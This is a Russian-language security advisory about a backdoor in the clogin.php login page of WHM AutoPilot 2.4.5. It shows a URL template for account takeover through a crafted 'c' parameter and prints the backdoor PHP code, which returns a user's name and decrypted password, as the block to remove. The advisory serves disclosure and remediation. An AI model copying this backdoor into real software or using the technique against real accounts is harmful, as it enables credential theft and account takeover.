Бекдор в странице входа в систему в WHM AutoPilot

Дата публикации:
02.08.2004
Дата изменения:
17.10.2006
Всего просмотров:
839
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
WHM AutoPilot 2.x
Уязвимые версии: WHM AutoPilot 2.4.5

Описание: Уязвимость в WHM AutoPilot позволяет удаленному пользователю получить опознавательные мандаты целевого пользователя.

Страница входа в систему 'clogin.php' содержит бекдор. Удаленный пользователь может представить http get запрос со специально сформированным параметром ‘c’, чтобы получить доступ к учетной записи целевого пользователя. Значение параметра основано на поле User ID целевого пользователя, шифрованного функцией clogin_e() и кодированным Base64. Поле User ID генерируется инкрементально и может быть легко предугадано. Пример:

http://[target domain]/accounts/clogin.php?c=[KEY]

URL производителя: http://www.whmautopilot.com/index.php

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Удалите следующий код из clogin.php:

if (isset($c))
{
$c=clogin_d(base64_decode($c));

$query="select ";
$query.="username, ";
$query.="password ";
$query.="from ";
$query.="user ";
$query.="where ";
$query.="uid='".addslashes(trim($c))."' ";
$query.="limit 0, 1";

$rs=mysql_fetch_row(mysql_query($query));

$username=$rs[0];
$password=clogin_d(base64_decode($rs[1]));
}


Ссылки: Sonicwall diag tool includes VPN credentlials
или введите имя

CAPTCHA